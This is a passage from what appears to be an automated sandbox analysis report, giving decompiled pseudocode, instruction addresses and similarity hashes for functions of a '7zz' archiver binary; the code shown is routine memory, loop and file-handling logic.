						if( *((intOrPtr*)(_t59 + 8)) ==  *((intOrPtr*)(_t60 + 8)) &&  *((intOrPtr*)(_t59 + 0xc)) ==  *((intOrPtr*)(_t60 + 0xc))) {
							if( *((intOrPtr*)(_t60 + 0x14)) == 0) {
								if( *_t59 != 0) {
									_t32 =  *_t59();
									L11:
									if( *((intOrPtr*)(_t59 + 0x18)) == 0) {
										_push(_t32);
										if( *((intOrPtr*)(_t59 + 0x14)) != 1) {
											E0040C9B4( *((intOrPtr*)(_t60 + 0x10)));
										} else {
											E0040C9B4( *((intOrPtr*)(_t60 - 0x14)));
										}
									} else {
										E0040C9B4( *((intOrPtr*)(_t60 - 0x10)), _t32);
									}
									goto L17;
								}
								goto L8;
							}
							if( *((intOrPtr*)(_t59 + 4)) != 0) {
								_t32 =  *((intOrPtr*)(_t59 + 4))();
								goto L11;
							} else {
								goto L8;
							}
						}
						L8:
						_t50 = _t50 + 1;
						_t45 = _t45 + 4;
					} while (_t50 < _t26);
					goto L17;
				}
			}












                                                                                                                                    0x0040c841
                                                                                                                                    0x0040c846
                                                                                                                                    0x0040c847
                                                                                                                                    0x0040c848
                                                                                                                                    0x0040c84e
                                                                                                                                    0x0040c853
                                                                                                                                    0x0040c859
                                                                                                                                    0x0040c85c
                                                                                                                                    0x0040c8bf
                                                                                                                                    0x0040c8c2
                                                                                                                                    0x0040c8c4
                                                                                                                                    0x0040c8c9
                                                                                                                                    0x0040c8cb
                                                                                                                                    0x0040c8d3
                                                                                                                                    0x0040c8d5
                                                                                                                                    0x0040c8da
                                                                                                                                    0x0040c8dd
                                                                                                                                    0x0040c8e8
                                                                                                                                    0x0040c8df
                                                                                                                                    0x0040c8df
                                                                                                                                    0x0040c8e4
                                                                                                                                    0x0040c8e4
                                                                                                                                    0x0040c8ed
                                                                                                                                    0x0040c8f2
                                                                                                                                    0x0040c8f9
                                                                                                                                    0x0040c8fc
                                                                                                                                    0x0040c8fc
                                                                                                                                    0x0040c8c9
                                                                                                                                    0x0040c909
                                                                                                                                    0x0040c911
                                                                                                                                    0x0040c85e
                                                                                                                                    0x0040c85e
                                                                                                                                    0x0040c863
                                                                                                                                    0x0040c863
                                                                                                                                    0x0040c86b
                                                                                                                                    0x0040c878
                                                                                                                                    0x0040c883
                                                                                                                                    0x0040c8b3
                                                                                                                                    0x0040c892
                                                                                                                                    0x0040c895
                                                                                                                                    0x0040c8a6
                                                                                                                                    0x0040c8a7
                                                                                                                                    0x0040c8ba
                                                                                                                                    0x0040c8a9
                                                                                                                                    0x0040c8ac
                                                                                                                                    0x0040c8ac
                                                                                                                                    0x0040c897
                                                                                                                                    0x0040c89b
                                                                                                                                    0x0040c89b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c895
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c883
                                                                                                                                    0x0040c87d
                                                                                                                                    0x0040c88f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c87f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c87f
                                                                                                                                    0x0040c87d
                                                                                                                                    0x0040c885
                                                                                                                                    0x0040c885
                                                                                                                                    0x0040c886
                                                                                                                                    0x0040c889
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c88d

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: I
                                                                                                                                    • API String ID: 3519838083-299795746
                                                                                                                                    • Opcode ID: 56e16adf2c1c2c4bf9a4c01dce7614d7d953c255dcd65ffa293d55832c84c1b6
                                                                                                                                    • Instruction ID: 7b3e389aea170d28871fe4c7e7a7ec955f419ab3ca2688fab4717e103c8f7ea0
                                                                                                                                    • Opcode Fuzzy Hash: 56e16adf2c1c2c4bf9a4c01dce7614d7d953c255dcd65ffa293d55832c84c1b6
                                                                                                                                    • Instruction Fuzzy Hash: F8218C72904245DBDB24FFA589C046EB7A2AB40305B24863FE152B76C1CB38AD45D79E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00415349 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E00415349(intOrPtr __ecx, intOrPtr __edx) {
				void* _t40;
				signed int _t41;
				signed int _t42;
				void* _t43;
				intOrPtr _t50;
				intOrPtr _t64;
				void* _t65;
				void* _t69;

				_t50 = __ecx;
				L0046B890(E00474820, _t69);
				 *((intOrPtr*)(_t69 - 0x14)) = __edx;
				 *((intOrPtr*)(_t69 - 0x18)) = __ecx;
				 *(_t69 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L8:
					E004152E1( *((intOrPtr*)(_t69 - 0x14)));
					_t40 = 0;
				} else {
					while(1) {
						_t41 =  *(_t50 + 0xc);
						_t64 =  *((intOrPtr*)(_t41 +  *(_t69 - 0x10) * 4));
						if( *((intOrPtr*)(_t64 + 4)) != 0) {
							_push(_t64);
							_push(0xffffffff);
							_t42 = E00415303( *((intOrPtr*)(_t69 - 0x14)), _t69, __eflags, 0xffffffff);
						} else {
							_t42 = _t41 | 0xffffffff;
						}
						 *((intOrPtr*)(_t69 - 0x28)) = 0;
						 *((intOrPtr*)(_t69 - 0x24)) = 0;
						 *((intOrPtr*)(_t69 - 0x20)) = 0;
						 *((intOrPtr*)(_t69 - 0x1c)) = 4;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 0;
						_t23 = _t64 + 0xc; // 0xc, executed
						_t43 = E00415420(_t23, _t42, 0xffffffff, _t64, _t69 - 0x2c,  *((intOrPtr*)(_t69 - 0x14)), 0,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 0x10))); // executed
						_t65 = _t43;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 1;
						E0040862D();
						 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
						E00408604(_t69 - 0x2c);
						if(_t65 != 0) {
							break;
						}
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						if( *(_t69 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t69 - 0x18)) + 8))) {
							_t50 =  *((intOrPtr*)(_t69 - 0x18));
							continue;
						} else {
							goto L8;
						}
						goto L9;
					}
					_t40 = _t65;
				}
				L9:
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}











                                                                                                                                    0x00415349
                                                                                                                                    0x0041534e
                                                                                                                                    0x0041535e
                                                                                                                                    0x00415361
                                                                                                                                    0x00415364
                                                                                                                                    0x00415367
                                                                                                                                    0x00415401
                                                                                                                                    0x00415404
                                                                                                                                    0x00415409
                                                                                                                                    0x0041536d
                                                                                                                                    0x00415377
                                                                                                                                    0x00415377
                                                                                                                                    0x0041537d
                                                                                                                                    0x00415383
                                                                                                                                    0x0041538d
                                                                                                                                    0x0041538e
                                                                                                                                    0x00415392
                                                                                                                                    0x00415385
                                                                                                                                    0x00415385
                                                                                                                                    0x00415385
                                                                                                                                    0x00415397
                                                                                                                                    0x0041539a
                                                                                                                                    0x0041539d
                                                                                                                                    0x004153a0
                                                                                                                                    0x004153a7
                                                                                                                                    0x004153b2
                                                                                                                                    0x004153c3
                                                                                                                                    0x004153c6
                                                                                                                                    0x004153cb
                                                                                                                                    0x004153cd
                                                                                                                                    0x004153d3
                                                                                                                                    0x004153da
                                                                                                                                    0x004153df
                                                                                                                                    0x004153e6
                                                                                                                                    0x004153ed
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004153ef
                                                                                                                                    0x004153fb
                                                                                                                                    0x00415374
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004153fb
                                                                                                                                    0x0041541c
                                                                                                                                    0x0041541c
                                                                                                                                    0x0041540b
                                                                                                                                    0x00415411
                                                                                                                                    0x00415419

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3519838083-2780377667
                                                                                                                                    • Opcode ID: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                                                                                    • Instruction ID: 7eef16f8fbdbee1da98b56e57a5457bfcb84ef35117a6ae98f398b0350cb022f
                                                                                                                                    • Opcode Fuzzy Hash: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                                                                                    • Instruction Fuzzy Hash: E62128B1D00519DFCB04DF99C8819EEFB71FB88368F20822EE52567290D7755981CF69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040B431 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040B431(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				signed int _t24;
				void* _t53;

				L0046B890(0x473d9c, _t53);
				_t47 =  *(_t53 + 8);
				if(L0040B669( *(_t53 + 8)) == 0) {
					_t15 = _t53 + 8;
					 *_t15 =  *(_t53 + 8) | 0xffffffff;
					__eflags =  *_t15;
					 *(_t53 - 4) = 1;
					_t24 = E0040B174(_t53 + 8, _t47,  *_t15, _t47, __ecx); // executed
					_t34 = _t24;
					E0040B154(_t53 + 8);
				} else {
					L0040B414(__ecx);
					 *(_t53 - 0x1c) =  *(_t53 - 0x1c) | 0xffffffff;
					 *((char*)(__ecx + 0x24)) = 1;
					_t34 = 0;
					 *(_t53 - 4) = 0;
					if(L0040BC4A(_t47) != 0) {
						L00403593(__ecx + 0x28, _t47 + 8);
						if( *((intOrPtr*)(_t53 - 0x17)) != 0) {
							 *__ecx =  *((intOrPtr*)(_t53 - 0x14));
							 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t53 - 0x10));
						}
						_t34 = 1;
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					L0040B87D(_t53 - 0x1c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t34;
			}






                                                                                                                                    0x0040b436
                                                                                                                                    0x0040b441
                                                                                                                                    0x0040b44f
                                                                                                                                    0x0040b49e
                                                                                                                                    0x0040b49e
                                                                                                                                    0x0040b49e
                                                                                                                                    0x0040b4a7
                                                                                                                                    0x0040b4ae
                                                                                                                                    0x0040b4b6
                                                                                                                                    0x0040b4b8
                                                                                                                                    0x0040b451
                                                                                                                                    0x0040b453
                                                                                                                                    0x0040b458
                                                                                                                                    0x0040b45c
                                                                                                                                    0x0040b460
                                                                                                                                    0x0040b466
                                                                                                                                    0x0040b470
                                                                                                                                    0x0040b479
                                                                                                                                    0x0040b481
                                                                                                                                    0x0040b486
                                                                                                                                    0x0040b48b
                                                                                                                                    0x0040b48b
                                                                                                                                    0x0040b48e
                                                                                                                                    0x0040b48e
                                                                                                                                    0x0040b490
                                                                                                                                    0x0040b497
                                                                                                                                    0x0040b497
                                                                                                                                    0x0040b4c5
                                                                                                                                    0x0040b4cd

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3519838083-2780377667
                                                                                                                                    • Opcode ID: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
                                                                                                                                    • Instruction ID: 8a2df7c348f84777b7ad1a159669c3b3579df71dbce98e58b468e3cdb01b9464
                                                                                                                                    • Opcode Fuzzy Hash: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
                                                                                                                                    • Instruction Fuzzy Hash: 2B11C4719002049ACB24EF59C4519EEBBB4EF55368F10823EE866A73C2C7389B05CB9C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406D26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                    			E00406D26(signed int* __ecx) {
				signed int _t17;
				signed int* _t18;
				signed int* _t22;
				signed int _t31;
				signed int* _t34;
				void* _t36;

				L0046B890(0x473641, _t36);
				_push(__ecx);
				_t34 = __ecx;
				 *__ecx =  *(_t36 + 8);
				_t22 = 0;
				_t17 = 4;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = _t17;
				__ecx[2] = 0x47a420;
				_t31 =  *__ecx;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				_push(_t31 * 0x1c + _t17); // executed
				_t18 = L004079F2(); // executed
				 *(_t36 + 8) = _t18;
				 *((char*)(_t36 - 4)) = 1;
				if(_t18 != 0) {
					_push(L00406E0B);
					_t11 =  &(_t18[1]); // 0x4
					_t22 = _t11;
					 *_t18 = _t31;
					L0046BDE5(_t22, 0x1c, _t31, 0x406da2);
				}
				 *(_t34 + 4) = _t22;
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}









                                                                                                                                    0x00406d2b
                                                                                                                                    0x00406d30
                                                                                                                                    0x00406d36
                                                                                                                                    0x00406d3b
                                                                                                                                    0x00406d3d
                                                                                                                                    0x00406d3f
                                                                                                                                    0x00406d40
                                                                                                                                    0x00406d43
                                                                                                                                    0x00406d46
                                                                                                                                    0x00406d49
                                                                                                                                    0x00406d4c
                                                                                                                                    0x00406d4f
                                                                                                                                    0x00406d56
                                                                                                                                    0x00406d58
                                                                                                                                    0x00406d62
                                                                                                                                    0x00406d63
                                                                                                                                    0x00406d69
                                                                                                                                    0x00406d6e
                                                                                                                                    0x00406d72
                                                                                                                                    0x00406d74
                                                                                                                                    0x00406d7e
                                                                                                                                    0x00406d7e
                                                                                                                                    0x00406d85
                                                                                                                                    0x00406d87
                                                                                                                                    0x00406d87
                                                                                                                                    0x00406d8f
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d9f

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 3519838083-2780377667
                                                                                                                                    • Opcode ID: 85091decba03f38f57ce9cf3bd97d4aa92c2ebce651225344e0e97771c0445fc
                                                                                                                                    • Instruction ID: 8e0203aed7f2cdd9f9826150055b001f54c225d166ae57bfc4d77955059de4c0
                                                                                                                                    • Opcode Fuzzy Hash: 85091decba03f38f57ce9cf3bd97d4aa92c2ebce651225344e0e97771c0445fc
                                                                                                                                    • Instruction Fuzzy Hash: E30152B1A00304AFD724DF5ED885A9AFBF4FB48704B50893FE14AD7781D3749A448B94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418A23 Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                    			E00418A23(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				L0046B890(E00474EAE, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = L004079F2();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00418C9D(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00401E9A(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00401E9A(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00401E9A(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					if(E0040A28C( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c, _t199 + 0x1c) != 0) {
						_t137 = L00407399(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401E26(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = L004072C9(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401E26(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E00418E2D(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_push( *((intOrPtr*)(_t199 + 0x14)));
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00418554(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = L0040B0A0(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00406796(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00407A18( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(L0040B0A0(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00406796(_t193);
									 *(_t199 - 4) = 4;
									E00407A18( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							L0043361B(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00407A18( *(_t199 - 0x30));
							E00407A18( *(_t199 - 0x24));
							E00407A18( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00407A18( *(_t199 - 0x30));
						E00407A18( *(_t199 - 0x24));
						E00407A18( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                                                                                                                                    0x00418a28
                                                                                                                                    0x00418a33
                                                                                                                                    0x00418a35
                                                                                                                                    0x00418a37
                                                                                                                                    0x00418a3c
                                                                                                                                    0x00418a3f
                                                                                                                                    0x00418a42
                                                                                                                                    0x00418a45
                                                                                                                                    0x00418a4b
                                                                                                                                    0x00418a50
                                                                                                                                    0x00418a53
                                                                                                                                    0x00418a60
                                                                                                                                    0x00418a60
                                                                                                                                    0x00418a55
                                                                                                                                    0x00418a5c
                                                                                                                                    0x00418a5c
                                                                                                                                    0x00418a62
                                                                                                                                    0x00418a68
                                                                                                                                    0x00418a6b
                                                                                                                                    0x00418a70
                                                                                                                                    0x00418a70
                                                                                                                                    0x00418a78
                                                                                                                                    0x00418a7e
                                                                                                                                    0x00418a85
                                                                                                                                    0x00418a88
                                                                                                                                    0x00418a8b
                                                                                                                                    0x00418a8e
                                                                                                                                    0x00418a98
                                                                                                                                    0x00418a9c
                                                                                                                                    0x00418a9f
                                                                                                                                    0x00418aa2
                                                                                                                                    0x00418aa5
                                                                                                                                    0x00418aaf
                                                                                                                                    0x00418ab3
                                                                                                                                    0x00418ab6
                                                                                                                                    0x00418ab9
                                                                                                                                    0x00418abc
                                                                                                                                    0x00418ac4
                                                                                                                                    0x00418ac8
                                                                                                                                    0x00418b92
                                                                                                                                    0x00418b97
                                                                                                                                    0x00000000
                                                                                                                                    0x00418ad7
                                                                                                                                    0x00418aea
                                                                                                                                    0x00418b31
                                                                                                                                    0x00418b3a
                                                                                                                                    0x00418b3e
                                                                                                                                    0x00418b46
                                                                                                                                    0x00418b4a
                                                                                                                                    0x00418b5a
                                                                                                                                    0x00418b63
                                                                                                                                    0x00418b67
                                                                                                                                    0x00418b6f
                                                                                                                                    0x00418b73
                                                                                                                                    0x00418b7c
                                                                                                                                    0x00418b80
                                                                                                                                    0x00418b83
                                                                                                                                    0x00418b9a
                                                                                                                                    0x00418b9a
                                                                                                                                    0x00418b9f
                                                                                                                                    0x00418ba2
                                                                                                                                    0x00418ba5
                                                                                                                                    0x00418ba8
                                                                                                                                    0x00418bab
                                                                                                                                    0x00418bae
                                                                                                                                    0x00418bb3
                                                                                                                                    0x00418bb5
                                                                                                                                    0x00418bb8
                                                                                                                                    0x00418bf4
                                                                                                                                    0x00418bf8
                                                                                                                                    0x00418bfd
                                                                                                                                    0x00418c00
                                                                                                                                    0x00418c03
                                                                                                                                    0x00418c07
                                                                                                                                    0x00418c0f
                                                                                                                                    0x00418c13
                                                                                                                                    0x00418c18
                                                                                                                                    0x00418c1c
                                                                                                                                    0x00418c1e
                                                                                                                                    0x00418c27
                                                                                                                                    0x00418c2f
                                                                                                                                    0x00418c32
                                                                                                                                    0x00418c36
                                                                                                                                    0x00418c3e
                                                                                                                                    0x00418c42
                                                                                                                                    0x00418c47
                                                                                                                                    0x00418c49
                                                                                                                                    0x00418c49
                                                                                                                                    0x00418c1e
                                                                                                                                    0x00418c4e
                                                                                                                                    0x00418c5a
                                                                                                                                    0x00418c63
                                                                                                                                    0x00418c66
                                                                                                                                    0x00418c6e
                                                                                                                                    0x00418c76
                                                                                                                                    0x00418c7b
                                                                                                                                    0x00418c85
                                                                                                                                    0x00418c8a
                                                                                                                                    0x00418c8a
                                                                                                                                    0x00418bba
                                                                                                                                    0x00418bbd
                                                                                                                                    0x00418bc5
                                                                                                                                    0x00418bcd
                                                                                                                                    0x00418bd2
                                                                                                                                    0x00418bd5
                                                                                                                                    0x00418bdc
                                                                                                                                    0x00418bde
                                                                                                                                    0x00418be3
